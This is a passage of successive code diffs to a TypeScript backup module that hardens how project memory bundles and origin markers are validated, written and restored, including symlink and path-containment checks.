+      claimed.add(local.projectPath);
       plan.matched.push({
         entry,
         files,
-        projectPath: origin.projectPath,
-        localMemoryDir: origin.memoryDir,
+        projectPath: local.projectPath,
+        localMemoryDir: local.memoryDir,
       });
       continue;
     }

--- a/src/node/services/backup/payload.ts
+++ b/src/node/services/backup/payload.ts
@@ -3537,5 +3537,17 @@ export async function collectOverwritableProjectMemory(
   // The writer charges the manifest against the same budget, so a preflight that skipped
   // it could pass a recovery copy the write would then refuse.
   budget(BACKUP_MANIFEST_FILE, serializeProjectBundleManifest(manifest).length);
+  // And validates it against the same schema: a local project path or name the manifest
+  // cannot record would otherwise refuse the restore only at the recovery write, after the
+  // core snapshot. Imports cap their targets to keep this from arising; this is the check
+  // that makes the preflight, not the write, the place it surfaces if it ever does.
+  const manifestCheck = BackupProjectBundleManifestSchema.safeParse(manifest);
+  if (!manifestCheck.success) {
+    throw new Error(
+      `Cannot snapshot project memory: ${manifestCheck.error.issues
+        .map((issue) => `${issue.path.join(".")}: ${issue.message}`)
+        .join("; ")}`
+    );
+  }
   return { manifest, files };
 }

--- a/src/node/services/backup/payload.ts
+++ b/src/node/services/backup/payload.ts
@@ -2622,10 +2622,21 @@ function assertAllowedBundleFilePath(
   relativePath: string,
   options: { portable: boolean } = { portable: true }
 ): void {
+  const segments = relativePath.split("/");
+  // The memory directory segment is derived from the project's basename, which may itself
+  // start with a dot (`~/.dotfiles` → `.dotfiles-<hash>`), so the hidden-name rule does not
+  // apply to it; it is held to its own charset and hash rules by assertValidBundleEntryDir
+  // and must equal a listed entry's directory exactly. `.`/`..` still fail the shape check.
+  const memoryDir = segments[2] ?? "";
+  const shapeChecked = [
+    ...segments.slice(0, 2),
+    /^\.{1,2}$/.test(memoryDir) ? memoryDir : memoryDir.replace(/^\./, "_"),
+    ...segments.slice(3),
+  ].join("/");
   if (
     !relativePath.startsWith(PROJECT_MEMORY_PATH_PREFIX) ||
-    relativePath.split("/").length < 4 ||
-    hasDisallowedPathShape(relativePath, options)
+    segments.length < 4 ||
+    hasDisallowedPathShape(shapeChecked, options)
   ) {
     throw new Error(`Backup project bundle contains disallowed path '${relativePath}'`);
   }
@@ -2641,9 +2652,10 @@ function assertAllowedBundleFilePath(
  */
 function assertValidBundleEntryDir(entry: BackupProjectBundleEntry): void {
   const { memoryDir } = entry;
+  // A leading dot is legitimate here (a `.dotfiles` project); `.` and `..` cannot pass the
+  // hash-suffix rule below.
   if (
     !/^[A-Za-z0-9._-]{1,64}$/.test(memoryDir) ||
-    isHiddenName(memoryDir) ||
     isForbiddenBasename(memoryDir) ||
     isWindowsUnusableSegment(memoryDir) ||
     !memoryDir.endsWith(`-${projectPathHashSuffix(entry.path)}`) ||
@@ -2823,7 +2835,12 @@ export async function assertManagedTreeWithinLimits(destinationDir: string): Pro
  * while `includeProjects` is off without ever blocking a core-only restore on its contents.
  */
 export async function projectBundleExists(sourceDir: string): Promise<boolean> {
-  return await fileExists(path.join(sourceDir, PROJECT_BUNDLE_DIR, BACKUP_MANIFEST_FILE));
+  // lstat, never stat: on hosts where git materializes symlinks, a crafted sidecar manifest
+  // pointing at a UNC path would otherwise be followed here — reached even with project
+  // backup off — and Windows would start SMB authentication. A symlinked manifest is
+  // treated as absent; the full read refuses it anyway.
+  const stat = await lstatOrNull(path.join(sourceDir, PROJECT_BUNDLE_DIR, BACKUP_MANIFEST_FILE));
+  return stat?.isFile() === true;
 }
 
 function parseProjectBundleManifest(raw: string): BackupProjectBundleManifest {
@@ -3055,12 +3072,18 @@ export function matchedProjectWrites(
 }
 
 /**
- * Hidden marker inside an imported project's memory directory recording which backed-up
- * project it came from. Dot-prefixed so MemoryService never lists or counts it and exports
- * never collect it; it travels with the memory directory and needs no config schema.
+ * Marker recording which backed-up project an imported memory directory came from, keyed by
+ * the local memory directory name. Kept in `memory/.backup-origins/` — beside, not inside,
+ * the project scopes — so no memory path a user or agent can address through MemoryService
+ * collides with it, and the core allowlist (which collects only `memory/global`) never
+ * exports it. Needs no config schema.
  */
-const PROJECT_MEMORY_ORIGIN_FILE = ".backup-origin.json";
+const PROJECT_MEMORY_ORIGINS_DIR = "memory/.backup-origins";
 const MAX_PROJECT_MEMORY_ORIGIN_BYTES = 4096;
+
+function projectMemoryOriginPath(rootPath: string, localMemoryDir: string): string {
+  return path.join(rootPath, ...PROJECT_MEMORY_ORIGINS_DIR.split("/"), `${localMemoryDir}.json`);
+}
 
 export async function writeProjectMemoryOrigin(
   muxRoot: string,
@@ -3068,16 +3091,9 @@ export async function writeProjectMemoryOrigin(
   sourcePath: string
 ): Promise<void> {
   const root = await resolveRoot(muxRoot);
-  const directory = await resolveContainedPath(
-    root.path,
-    `${PROJECT_MEMORY_PATH_PREFIX}${localMemoryDir}`
-  );
-  await fs.mkdir(directory, { recursive: true });
-  await fs.writeFile(
-    path.join(directory, PROJECT_MEMORY_ORIGIN_FILE),
-    `${JSON.stringify({ sourcePath })}\n`,
-    "utf-8"
-  );
+  const marker = projectMemoryOriginPath(root.path, localMemoryDir);
+  await fs.mkdir(path.dirname(marker), { recursive: true });
+  await fs.writeFile(marker, `${JSON.stringify({ sourcePath })}\n`, "utf-8");
 }
 
 /**
@@ -3093,7 +3109,7 @@ export async function readProjectMemoryOrigins(
   const origins = new Map<string, ProjectMemoryOrigin>();
   const registered = [...registeredDirByPath.entries()].sort(([a], [b]) => a.localeCompare(b));
   for (const [projectPath, memoryDir] of registered) {
-    const marker = path.join(root.path, "memory", "project", memoryDir, PROJECT_MEMORY_ORIGIN_FILE);
+    const marker = projectMemoryOriginPath(root.path, memoryDir);
     const stat = await lstatOrNull(marker);
     if (stat?.isFile() !== true || stat.size > MAX_PROJECT_MEMORY_ORIGIN_BYTES) continue;
     let sourcePath: unknown;
@@ -3208,9 +3224,15 @@ export async function writeProjectMemoryFiles(
   const skipped: string[] = [];
   try {
     for (const write of planned) {
-      if (write.exists) {
-        const current = await readCheckedFile(root, write.path, () => undefined);
-        if (current.content.equals(write.content)) continue;
+      if (write.existingSize !== null) {
+        // Sizes first, from the planning lstat: an existing file of a different size can
+        // never be identical, so it is never read — an externally bloated destination would
+        // otherwise be buffered whole just to detect a conflict. Equal sizes are bounded by
+        // the incoming file's own memory limit.
+        if (write.existingSize === write.content.length) {
+          const current = await readCheckedFile(root, write.path, () => undefined);
+          if (current.content.equals(write.content)) continue;
+        }
         if (options.addOnly) {
           skipped.push(write.path);
           continue;
@@ -3249,12 +3271,12 @@ export async function assertProjectMemoryWritesAllowed(
 async function planProjectMemoryWrites(
   root: BackupRoot,
   writes: ReadonlyArray<{ path: string; content: Buffer }>
-): Promise<Array<{ path: string; content: Buffer; exists: boolean }>> {
+): Promise<Array<{ path: string; content: Buffer; existingSize: number | null }>> {
   // Charged so a marker-thin bundle cannot expand past the same bound reads enforce.
   const budget = createByteBudget();
   // Everything refusable is refused before the first write, so a rejected bundle
   // changes nothing on disk.
-  const planned: Array<{ path: string; content: Buffer; exists: boolean }> = [];
+  const planned: Array<{ path: string; content: Buffer; existingSize: number | null }> = [];
   for (const write of writes) {
     assertAllowedBundleFilePath(write.path);
     // The memory subsystem's own read limit: a restored file larger than this would be
@@ -3271,14 +3293,18 @@ async function planProjectMemoryWrites(
     if (existing !== null && !existing.isFile()) {
       throw new Error(`Cannot restore '${write.path}': a non-file already exists there`);
     }
-    planned.push({ path: write.path, content: write.content, exists: existing !== null });
+    planned.push({
+      path: write.path,
+      content: write.content,
+      existingSize: existing === null ? null : existing.size,
+    });
   }
   // Per-scope file-count cap, mirrored from MemoryService. Only growth past the limit is
   // refused: a store that already exceeds it (hand-placed files) can still be restored
   // in place as long as this restore does not add to the overflow.
   const addsByDir = new Map<string, number>();
   for (const write of planned) {
-    if (write.exists) continue;
+    if (write.existingSize !== null) continue;
     const scopeDir = write.path.split("/").slice(0, 3).join("/");
     addsByDir.set(scopeDir, (addsByDir.get(scopeDir) ?? 0) + 1);
   }

--- a/src/node/services/backup/payload.ts
+++ b/src/node/services/backup/payload.ts
@@ -3095,13 +3095,16 @@ export function matchedProjectWrites(
 }
 
 /**
- * Marker recording which local project an imported source lives in, keyed by the recorded
- * source path (hashed) so each source has exactly one marker: a later import of the same
- * source elsewhere replaces it — the newest explicit association wins — and a restore locates
- * it without scanning the directory. Kept in `memory/.backup-origins/` — beside, not inside,
- * the project scopes — so no memory path a user or agent can address through MemoryService
- * collides with it, and the core allowlist (which collects only `memory/global`) never
- * exports it. Needs no config schema.
+ * Markers recording which local project an imported source lives in, as a pair of records
+ * that must agree: one keyed by the recorded source path (hashed) and one keyed by the local
+ * memory directory (hashed), each naming the other. A source has one record and a project has
+ * one record, so importing a source elsewhere or importing another source into the same
+ * project each replace exactly one record and thereby invalidate the association it
+ * superseded — the newest explicit association is the only one both sides confirm — and a
+ * restore locates a source's association in two reads, never by scanning the directory.
+ * Kept in `memory/.backup-origins/` — beside, not inside, the project scopes — so no memory
+ * path a user or agent can address through MemoryService collides with it, and the core
+ * allowlist (which collects only `memory/global`) never exports it. Needs no config schema.
  */
 const PROJECT_MEMORY_ORIGINS_DIR = "memory/.backup-origins";
 /**
@@ -3113,6 +3116,10 @@ const MAX_PROJECT_MEMORY_ORIGIN_BYTES = 8192;
 
 function projectMemoryOriginPath(sourcePath: string): string {
   return `${PROJECT_MEMORY_ORIGINS_DIR}/${sha256(Buffer.from(sourcePath, "utf-8")).slice(0, 32)}.json`;
+}
+
+function projectMemoryOriginTargetPath(localMemoryDir: string): string {
+  return `${PROJECT_MEMORY_ORIGINS_DIR}/target-${sha256(Buffer.from(localMemoryDir, "utf-8")).slice(0, 32)}.json`;
 }
 
 export async function writeProjectMemoryOrigin(
@@ -3130,7 +3137,23 @@ export async function writeProjectMemoryOrigin(
   if (content.length > MAX_PROJECT_MEMORY_ORIGIN_BYTES) {
     throw new Error("Cannot record the imported project's origin: the marker is too large");
   }
-  const relativePath = projectMemoryOriginPath(sourcePath);
+  // The source's record first, then the project's. Should the second write fail, the
+  // source's old project (if any) still names a different source and this project's record
+  // still names its previous source, so the reader confirms neither new half: the previous
+  // associations stand, and the import is reported failed for a clean retry.
+  await writeProjectMemoryOriginRecord(root, projectMemoryOriginPath(sourcePath), content);
+  await writeProjectMemoryOriginRecord(
+    root,
+    projectMemoryOriginTargetPath(localMemoryDir),
+    content
+  );
+}
+
+async function writeProjectMemoryOriginRecord(
+  root: BackupRoot,
+  relativePath: string,
+  content: Buffer
+): Promise<void> {
   const staging = `${relativePath}.tmp`;
   // Contained and then written through the checked writer, like every other file a restore
   // lands: `.backup-origins` or the marker itself left behind as a symlink (a copied or
@@ -3138,9 +3161,8 @@ export async function writeProjectMemoryOrigin(
   // file outside the memory tree with backup-controlled JSON.
   await resolveContainedPath(root.path, relativePath);
   await resolveContainedPath(root.path, staging);
-  // Staged beside the marker and renamed over it, so the source's previous association is
-  // replaced only by a complete replacement: a write that fails midway (disk full) leaves
-  // the old marker as it was rather than deleting a valid claim for nothing.
+  // Staged beside the record and renamed over it, so a record is replaced only by a complete
+  // replacement: a write that fails midway (disk full) leaves the old record as it was.
   try {
     await writeCheckedFile(root, staging, content, false);
     await fs.rename(absolutePathOf(root.path, staging), absolutePathOf(root.path, relativePath));
@@ -3150,13 +3172,13 @@ export async function writeProjectMemoryOrigin(
   }
 }
 
-/** A marker's recorded fields, or null for a missing, unreadable, refused, or malformed one. */
-async function readProjectMemoryOriginMarker(
+/** A record's fields, or null for a missing, unreadable, refused, or malformed one. */
+async function readProjectMemoryOriginRecord(
   root: BackupRoot,
   relativePath: string
 ): Promise<{ sourcePath: string; memoryDir: string } | null> {
   try {
-    // The checked reader refuses a symlinked directory or marker the same way the writer
+    // The checked reader refuses a symlinked directory or record the same way the writer
     // does, so a planted link cannot re-point a project at another source.
     const { content } = await readCheckedFile(root, relativePath, (size) => {
       if (size > MAX_PROJECT_MEMORY_ORIGIN_BYTES) throw new Error("origin marker too large");
@@ -3177,8 +3199,8 @@ async function readProjectMemoryOriginMarker(
 
 /**
  * Recorded source path → local project, for the given sources (a bundle's entries) whose
- * marker names a currently registered project. Bounded by the sources asked about, never by
- * how many markers have accumulated.
+ * association a currently registered project confirms from its side. Bounded by the sources
+ * asked about, never by how many records have accumulated.
  */
 export async function readProjectMemoryOrigins(
   muxRoot: string,
@@ -3188,20 +3210,29 @@ export async function readProjectMemoryOrigins(
   const root = await resolveRoot(muxRoot);
   // Memory dir → registered project. Two registered projects computing one dir name is all
   // but impossible (the name carries a hash of the path); should it happen, the dir names
-  // neither, since the marker could not say which project it meant.
+  // neither, since the record could not say which project it meant.
   const projectByDir = new Map<string, string | null>();
   for (const [projectPath, memoryDir] of registeredDirByPath) {
     projectByDir.set(memoryDir, projectByDir.has(memoryDir) ? null : projectPath);
   }
   const origins = new Map<string, ProjectMemoryOrigin>();
   for (const sourcePath of new Set(sourcePaths)) {
-    const marker = await readProjectMemoryOriginMarker(root, projectMemoryOriginPath(sourcePath));
-    // The file is named by the source's hash; the recorded source has to agree, or the
-    // marker is not this source's (a hand-placed or corrupted file).
-    if (marker?.sourcePath !== sourcePath) continue;
-    const projectPath = projectByDir.get(marker.memoryDir);
+    const claim = await readProjectMemoryOriginRecord(root, projectMemoryOriginPath(sourcePath));
+    // Each file is named by a hash of one field; the recorded fields have to agree with the
+    // name and with each other, or the record is not this association's (a hand-placed or
+    // corrupted file, or a superseded half).
+    if (claim?.sourcePath !== sourcePath) continue;
+    const projectPath = projectByDir.get(claim.memoryDir);
     if (projectPath == null) continue;
-    origins.set(sourcePath, { projectPath, memoryDir: marker.memoryDir });
+    // The project's own record must name this source back: a project imported into again
+    // from another source names that source now, and the older claim on it is void even
+    // though the older source's record still exists.
+    const target = await readProjectMemoryOriginRecord(
+      root,
+      projectMemoryOriginTargetPath(claim.memoryDir)
+    );
+    if (target?.sourcePath !== sourcePath || target.memoryDir !== claim.memoryDir) continue;
+    origins.set(sourcePath, { projectPath, memoryDir: claim.memoryDir });
   }
   return origins;
 }

--- a/src/node/services/backup/payload.ts
+++ b/src/node/services/backup/payload.ts
@@ -3297,22 +3297,37 @@ export async function readProjectMemoryOrigins(
     if (claim?.sourcePath !== sourcePath) continue;
     // The project's own record must name this source back: a project imported into again
     // from another source names that source now, and the older claim on it is void even
-    // though the older source's record still exists. The project the source came from is
-    // tried second: a re-import interrupted between its two writes (a crash) has updated the
-    // source's record but not the new project's, and the old project's record still
-    // confirms the source, so that association stands until the pair is completed.
-    for (const memoryDir of [claim.memoryDir, claim.previousMemoryDir]) {
-      if (memoryDir === undefined) continue;
-      const projectPath = projectByDir.get(memoryDir);
-      if (projectPath == null) continue;
-      const target = await readProjectMemoryOriginRecord(
-        root,
-        projectMemoryOriginTargetPath(memoryDir)
-      );
-      if (target?.sourcePath !== sourcePath || target.memoryDir !== memoryDir) continue;
-      origins.set(sourcePath, { projectPath, memoryDir });
-      break;
+    // though the older source's record still exists.
+    const targetBytes = await readProjectMemoryOriginRecordBytes(
+      root,
+      projectMemoryOriginTargetPath(claim.memoryDir)
+    );
+    let memoryDir: string | undefined;
+    if (targetBytes === "absent") {
+      // No record at all for the new project: the re-import that wrote this claim was
+      // interrupted between its two writes, so the pair is provably incomplete and the
+      // project the source came from — whose record a crash leaves intact — still confirms
+      // the association. Only then: a record that exists but names another source means the
+      // pair was completed and later superseded (or the project was imported into meanwhile),
+      // and the previous project's stale record must not bring the old association back.
+      const previousDir = claim.previousMemoryDir;
+      const previous =
+        previousDir === undefined
+          ? null
+          : await readProjectMemoryOriginRecord(root, projectMemoryOriginTargetPath(previousDir));
+      if (previous?.sourcePath === sourcePath && previous.memoryDir === previousDir) {
+        memoryDir = previousDir;
+      }
+    } else if (Buffer.isBuffer(targetBytes)) {
+      const target = parseProjectMemoryOriginRecord(targetBytes);
+      if (target?.sourcePath === sourcePath && target.memoryDir === claim.memoryDir) {
+        memoryDir = claim.memoryDir;
+      }
     }
+    if (memoryDir === undefined) continue;
+    const projectPath = projectByDir.get(memoryDir);
+    if (projectPath == null) continue;
+    origins.set(sourcePath, { projectPath, memoryDir });
   }
   return origins;
 }

--- a/src/node/services/backup/payload.ts
+++ b/src/node/services/backup/payload.ts
@@ -745,10 +745,25 @@ function createBackupFileCollector(root: BackupRoot) {
   const links = createHardLinkTracker();
   const pathComplexity = createBackupPathComplexityTracker();
 
+  /**
+   * `maxFileBytes` and `maxFiles` skip what the caller would drop anyway, before the file
+   * count or byte budget is charged and before any read, so a directory with oversized or
+   * surplus files can never block a collection that means to leave them out.
+   */
   async function collectDirectory(
     relativeRoot: string,
     filter: (relativePath: string, entry: Dirent) => boolean,
-    collectOptions: { maxFileBytes?: number } = {}
+    collectOptions: { maxFileBytes?: number; maxFiles?: number } = {}
+  ): Promise<void> {
+    const progress = { collected: 0 };
+    await walkDirectory(relativeRoot, filter, collectOptions, progress);
+  }
+
+  async function walkDirectory(
+    relativeRoot: string,
+    filter: (relativePath: string, entry: Dirent) => boolean,
+    collectOptions: { maxFileBytes?: number; maxFiles?: number },
+    progress: { collected: number }
   ): Promise<void> {
     const absoluteRoot = path.join(root.path, ...relativeRoot.split("/"));
     // A symlinked collection root would let readdir walk outside MUX_ROOT, and restore
@@ -770,11 +785,14 @@ function createBackupFileCollector(root: BackupRoot) {
       const relativePath = toPosixPath(relativeRoot, entry.name);
       if (!filter(relativePath, entry)) continue;
       if (entry.isDirectory()) {
-        await collectDirectory(relativePath, filter, collectOptions);
+        await walkDirectory(relativePath, filter, collectOptions, progress);
       } else if (entry.isFile() && !isForbiddenBasename(entry.name)) {
-        // Skipped by size before anything is charged: a file the caller would drop must
-        // not consume the file count or the byte budget, or one corrupted memory file
-        // could block every export.
+        if (
+          collectOptions.maxFiles !== undefined &&
+          progress.collected >= collectOptions.maxFiles
+        ) {
+          continue;
+        }
         if (collectOptions.maxFileBytes !== undefined) {
           const stat = await lstatOrNull(path.join(root.path, ...relativePath.split("/")));
           if (stat !== null && stat.size > collectOptions.maxFileBytes) continue;
@@ -782,6 +800,7 @@ function createBackupFileCollector(root: BackupRoot) {
         assertBackupFileCount(files.length + 1);
         pathComplexity.recordFile(relativePath);
         files.push(await readBackupFile(root, relativePath, budget, links));
+        progress.collected += 1;
       }
     }
   }
@@ -2660,7 +2679,7 @@ export function bundleEntryFiles(
 export async function collectProjectBundle(
   muxRoot: string,
   entries: readonly BackupProjectBundleEntry[],
-  options: { skipOversizedMemoryFiles?: boolean } = {}
+  options: { portableMemoryOnly?: boolean } = {}
 ): Promise<BackupProjectBundle> {
   if (entries.length > MAX_BACKUP_PROJECT_ENTRIES) {
     throw new Error(`Backup has more than ${MAX_BACKUP_PROJECT_ENTRIES} projects`);
@@ -2689,10 +2708,13 @@ export async function collectProjectBundle(
     await collector.collectDirectory(
       `${PROJECT_MEMORY_PATH_PREFIX}${entry.memoryDir}`,
       () => true,
-      // Exports skip files the memory subsystem itself refuses to read: bundling them
-      // would produce a backup this build's own restore rejects. Snapshots keep full
-      // fidelity so an overwritten oversized local file stays recoverable.
-      options.skipOversizedMemoryFiles === true ? { maxFileBytes: MEMORY_MAX_FILE_BYTES } : {}
+      // Exports skip what the memory subsystem itself could not have produced or cannot
+      // read — files past its size limit and files beyond its per-scope count: bundling
+      // them would produce a backup this build's own restore rejects. Snapshots keep
+      // full fidelity so an overwritten oversized local file stays recoverable.
+      options.portableMemoryOnly === true
+        ? { maxFileBytes: MEMORY_MAX_FILE_BYTES, maxFiles: MEMORY_MAX_FILES_PER_SCOPE }
+        : {}
     );
   }
   collector.assertHardLinksContained();
@@ -2728,6 +2750,17 @@ export async function writeProjectBundle(
 ): Promise<void> {
   const portable = options.portable !== false;
   const ownerOnly = options.ownerOnly === true;
+  // The same schema the reader enforces, so an entry this install generated but no build
+  // can read back (a registered path past the manifest's cap) fails the export here, not
+  // the next restore.
+  const manifestCheck = BackupProjectBundleManifestSchema.safeParse(bundle.manifest);
+  if (!manifestCheck.success) {
+    throw new Error(
+      `Cannot back up the project list: ${manifestCheck.error.issues
+        .map((issue) => `${issue.path.join(".")}: ${issue.message}`)
+        .join("; ")}`
+    );
+  }
   assertBackupFileCount(bundle.files.length);
   assertBackupPathComplexity(bundle.files.map((file) => file.path));
   for (const file of bundle.files) assertAllowedBundleFilePath(file.path, { portable });

--- a/src/node/services/backup/payload.ts
+++ b/src/node/services/backup/payload.ts
@@ -3095,18 +3095,24 @@ export function matchedProjectWrites(
 }
 
 /**
- * Marker recording which backed-up project an imported memory directory came from, keyed by
- * the local memory directory name. Kept in `memory/.backup-origins/` — beside, not inside,
+ * Marker recording which local project an imported source lives in, keyed by the recorded
+ * source path (hashed) so each source has exactly one marker: a later import of the same
+ * source elsewhere replaces it — the newest explicit association wins — and a restore locates
+ * it without scanning the directory. Kept in `memory/.backup-origins/` — beside, not inside,
  * the project scopes — so no memory path a user or agent can address through MemoryService
  * collides with it, and the core allowlist (which collects only `memory/global`) never
  * exports it. Needs no config schema.
  */
 const PROJECT_MEMORY_ORIGINS_DIR = "memory/.backup-origins";
-const MAX_PROJECT_MEMORY_ORIGIN_BYTES = 4096;
+/**
+ * Bound on a marker's bytes, aligned with what the writer can produce: a schema-capped
+ * 1024-character source path fully `\uXXXX`-escaped (6144 bytes), a 64-character memory
+ * directory name, and the JSON framing.
+ */
+const MAX_PROJECT_MEMORY_ORIGIN_BYTES = 8192;
 
-/** Root-relative, so the checked reader and writer walk every component below the root. */
-function projectMemoryOriginPath(localMemoryDir: string): string {
-  return `${PROJECT_MEMORY_ORIGINS_DIR}/${localMemoryDir}.json`;
+function projectMemoryOriginPath(sourcePath: string): string {
+  return `${PROJECT_MEMORY_ORIGINS_DIR}/${sha256(Buffer.from(sourcePath, "utf-8")).slice(0, 32)}.json`;
 }
 
 export async function writeProjectMemoryOrigin(
@@ -3115,56 +3121,40 @@ export async function writeProjectMemoryOrigin(
   sourcePath: string
 ): Promise<void> {
   const root = await resolveRoot(muxRoot);
-  const relativePath = projectMemoryOriginPath(localMemoryDir);
+  const content = Buffer.from(
+    `${JSON.stringify({ sourcePath, memoryDir: localMemoryDir })}\n`,
+    "utf-8"
+  );
+  // The reader's cap, checked before writing: an import must not report success with a
+  // marker no later restore will read.
+  if (content.length > MAX_PROJECT_MEMORY_ORIGIN_BYTES) {
+    throw new Error("Cannot record the imported project's origin: the marker is too large");
+  }
+  const relativePath = projectMemoryOriginPath(sourcePath);
+  const staging = `${relativePath}.tmp`;
   // Contained and then written through the checked writer, like every other file a restore
   // lands: `.backup-origins` or the marker itself left behind as a symlink (a copied or
   // corrupted Xum home) would otherwise be followed, and an approved import would replace a
   // file outside the memory tree with backup-controlled JSON.
   await resolveContainedPath(root.path, relativePath);
-  // The newest explicit association is the only one kept. A marker left by an earlier
-  // import of this source — its project since unregistered, or still registered — would
-  // otherwise survive as a second claim: re-registering that project later would make the
-  // source ambiguous, or match whichever project sorted first and overwrite its memory in
-  // matched mode without any approval.
-  for (const claim of await listProjectMemoryOriginClaims(root, sourcePath)) {
-    if (claim !== relativePath) await fs.unlink(absolutePathOf(root.path, claim));
+  await resolveContainedPath(root.path, staging);
+  // Staged beside the marker and renamed over it, so the source's previous association is
+  // replaced only by a complete replacement: a write that fails midway (disk full) leaves
+  // the old marker as it was rather than deleting a valid claim for nothing.
+  try {
+    await writeCheckedFile(root, staging, content, false);
+    await fs.rename(absolutePathOf(root.path, staging), absolutePathOf(root.path, relativePath));
+  } catch (error) {
+    await fs.rm(absolutePathOf(root.path, staging), { force: true }).catch(() => undefined);
+    throw error;
   }
-  await writeCheckedFile(
-    root,
-    relativePath,
-    Buffer.from(`${JSON.stringify({ sourcePath })}\n`, "utf-8"),
-    false
-  );
 }
 
-/** Root-relative paths of every marker recording `sourcePath`, whichever project they name. */
-async function listProjectMemoryOriginClaims(
-  root: BackupRoot,
-  sourcePath: string
-): Promise<string[]> {
-  const entries = await fs
-    .readdir(absolutePathOf(root.path, PROJECT_MEMORY_ORIGINS_DIR), { withFileTypes: true })
-    .catch((error: unknown) => {
-      if (isErrnoWithCode(error, "ENOENT") || isErrnoWithCode(error, "ENOTDIR")) return [];
-      throw error;
-    });
-  const claims: string[] = [];
-  for (const entry of entries) {
-    // Dirent reports a symlink as neither file nor directory, so links are never read.
-    if (!entry.isFile() || !entry.name.endsWith(".json")) continue;
-    const relativePath = `${PROJECT_MEMORY_ORIGINS_DIR}/${entry.name}`;
-    if ((await readProjectMemoryOriginSource(root, relativePath)) === sourcePath) {
-      claims.push(relativePath);
-    }
-  }
-  return claims;
-}
-
-/** The source a marker records, or null for a missing, unreadable, refused, or malformed one. */
-async function readProjectMemoryOriginSource(
+/** A marker's recorded fields, or null for a missing, unreadable, refused, or malformed one. */
+async function readProjectMemoryOriginMarker(
   root: BackupRoot,
   relativePath: string
-): Promise<string | null> {
+): Promise<{ sourcePath: string; memoryDir: string } | null> {
   try {
     // The checked reader refuses a symlinked directory or marker the same way the writer
     // does, so a planted link cannot re-point a project at another source.
@@ -3172,37 +3162,46 @@ async function readProjectMemoryOriginSource(
       if (size > MAX_PROJECT_MEMORY_ORIGIN_BYTES) throw new Error("origin marker too large");
     });
     const parsed: unknown = JSON.parse(content.toString("utf-8"));
-    const sourcePath = isPlainObject(parsed) ? parsed.sourcePath : undefined;
-    return typeof sourcePath === "string" && sourcePath !== "" ? sourcePath : null;
+    if (!isPlainObject(parsed)) return null;
+    const { sourcePath, memoryDir } = parsed;
+    return typeof sourcePath === "string" &&
+      sourcePath !== "" &&
+      typeof memoryDir === "string" &&
+      memoryDir !== ""
+      ? { sourcePath, memoryDir }
+      : null;
   } catch {
     return null;
   }
 }
 
 /**
- * Recorded source path → local project, for every registered project whose memory
- * directory carries an origin marker. A source claimed by two registered projects is
- * ambiguous and left unmatched (both are re-offered as imports): the writer removes older
- * claims, so this arises only from a copied home or hand-placed markers, and picking one
- * lexically would overwrite an arbitrary project's memory in matched mode without approval.
+ * Recorded source path → local project, for the given sources (a bundle's entries) whose
+ * marker names a currently registered project. Bounded by the sources asked about, never by
+ * how many markers have accumulated.
  */
 export async function readProjectMemoryOrigins(
   muxRoot: string,
-  registeredDirByPath: ReadonlyMap<string, string>
+  registeredDirByPath: ReadonlyMap<string, string>,
+  sourcePaths: Iterable<string>
 ): Promise<Map<string, ProjectMemoryOrigin>> {
   const root = await resolveRoot(muxRoot);
-  const claims = new Map<string, ProjectMemoryOrigin[]>();
+  // Memory dir → registered project. Two registered projects computing one dir name is all
+  // but impossible (the name carries a hash of the path); should it happen, the dir names
+  // neither, since the marker could not say which project it meant.
+  const projectByDir = new Map<string, string | null>();
   for (const [projectPath, memoryDir] of registeredDirByPath) {
-    const sourcePath = await readProjectMemoryOriginSource(
-      root,
-      projectMemoryOriginPath(memoryDir)
-    );
-    if (sourcePath === null) continue;
-    claims.set(sourcePath, [...(claims.get(sourcePath) ?? []), { projectPath, memoryDir }]);
+    projectByDir.set(memoryDir, projectByDir.has(memoryDir) ? null : projectPath);
   }
   const origins = new Map<string, ProjectMemoryOrigin>();
-  for (const [sourcePath, projects] of claims) {
-    if (projects.length === 1) origins.set(sourcePath, projects[0]);
+  for (const sourcePath of new Set(sourcePaths)) {
+    const marker = await readProjectMemoryOriginMarker(root, projectMemoryOriginPath(sourcePath));
+    // The file is named by the source's hash; the recorded source has to agree, or the
+    // marker is not this source's (a hand-placed or corrupted file).
+    if (marker?.sourcePath !== sourcePath) continue;
+    const projectPath = projectByDir.get(marker.memoryDir);
+    if (projectPath == null) continue;
+    origins.set(sourcePath, { projectPath, memoryDir: marker.memoryDir });
   }
   return origins;
 }

--- a/src/node/services/backup/payload.ts
+++ b/src/node/services/backup/payload.ts
@@ -3128,8 +3128,23 @@ export async function writeProjectMemoryOrigin(
   sourcePath: string
 ): Promise<void> {
   const root = await resolveRoot(muxRoot);
+  const sourceRecord = projectMemoryOriginPath(sourcePath);
+  const previous = await readProjectMemoryOriginRecordBytes(root, sourceRecord);
+  // The source's new record names the project it is leaving, if any: two files cannot change
+  // atomically, and a crash between the two writes is not an exception the rollback below
+  // can catch. With the previous project on record, the reader can still confirm the old
+  // association through that project's own record until the new pair is complete.
+  const previousMemoryDir = Buffer.isBuffer(previous)
+    ? parseProjectMemoryOriginRecord(previous)?.memoryDir
+    : undefined;
   const content = Buffer.from(
-    `${JSON.stringify({ sourcePath, memoryDir: localMemoryDir })}\n`,
+    `${JSON.stringify({
+      sourcePath,
+      memoryDir: localMemoryDir,
+      ...(previousMemoryDir !== undefined && previousMemoryDir !== localMemoryDir
+        ? { previousMemoryDir }
+        : {}),
+    })}\n`,
     "utf-8"
   );
   // The reader's cap, checked before writing: an import must not report success with a
@@ -3137,20 +3152,19 @@ export async function writeProjectMemoryOrigin(
   if (content.length > MAX_PROJECT_MEMORY_ORIGIN_BYTES) {
     throw new Error("Cannot record the imported project's origin: the marker is too large");
   }
-  // Two files cannot change atomically, so the source's record goes first and is put back
-  // the way it was if the project's record then cannot be written: otherwise a failed
-  // re-import of a source elsewhere would leave neither its old association nor its new one
-  // with two agreeing halves, and later restores would stop matching the project it still
-  // lives in. The restore is best effort under the same I/O conditions that failed the
-  // write; if it fails too, the reader confirms neither half rather than a wrong one.
-  const sourceRecord = projectMemoryOriginPath(sourcePath);
-  const previous = await readProjectMemoryOriginRecordBytes(root, sourceRecord);
+  // The source's record goes first and is put back the way it was if the project's record
+  // then cannot be written: otherwise a failed re-import of a source elsewhere would leave
+  // neither its old association nor its new one with two agreeing halves. Best effort under
+  // the same I/O conditions that failed the write; if it fails too, `previousMemoryDir`
+  // above still lets the reader confirm the old association.
   await writeProjectMemoryOriginRecord(root, sourceRecord, content);
   try {
     await writeProjectMemoryOriginRecord(
       root,
       projectMemoryOriginTargetPath(localMemoryDir),
-      content
